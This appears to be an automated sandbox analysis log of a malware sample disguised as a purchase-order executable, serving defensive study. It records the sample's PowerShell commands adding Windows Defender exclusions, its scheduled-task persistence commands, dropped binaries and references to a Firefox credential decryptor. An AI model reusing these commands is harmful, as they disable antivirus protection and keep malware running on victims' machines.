Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: Microsofts.exe.8.dr, UltraSpeed.cs	Reference to suspicious API methods: MapVirtualKey(VKCode, 0u)
Source: Microsofts.exe.8.dr, FFDecryptor.cs	Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
Source: Microsofts.exe.8.dr, FFDecryptor.cs	Reference to suspicious API methods: hModuleList.Add(LoadLibrary(text9 + "\\mozglue.dll"))

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe"
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\zeXKjViL.exe"
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe"	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\zeXKjViL.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	NtOpenKeyEx: Indirect: 0x140077B9B
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	NtQueryValueKey: Indirect: 0x140077C9F
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	NtClose: Indirect: 0x140077E81

Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe"	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\zeXKjViL.exe"	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zeXKjViL" /XML "C:\Users\user\AppData\Local\Temp\tmp29D3.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process created: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe "C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe"	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process created: C:\Users\user\AppData\Local\Temp\Microsofts.exe "C:\Users\user\AppData\Local\Temp\Microsofts.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zeXKjViL" /XML "C:\Users\user\AppData\Local\Temp\tmp6E4E.tmp"
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Process created: C:\Users\user\AppData\Roaming\zeXKjViL.exe "C:\Users\user\AppData\Roaming\zeXKjViL.exe"
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Process created: C:\Users\user\AppData\Roaming\zeXKjViL.exe "C:\Users\user\AppData\Roaming\zeXKjViL.exe"
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 03:10 /du 23:59 /sc daily /ri 1 /f
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process created: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe"

Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe

Code function: 8_2_02BF8550 GetVolumeInformationW,wsprintfW,GetLastError,GetLastError,GetUserNameW,GetLastError,GetLastError,GetUserNameW,FreeSid,LocalFree,AllocateAndInitializeSid,wsprintfW,SetEntriesInAclW,GetLastError,OpenMutexW,

8_2_02BF8550

Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe

Code function: GetLocaleInfoA,

8_2_00417A20

Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
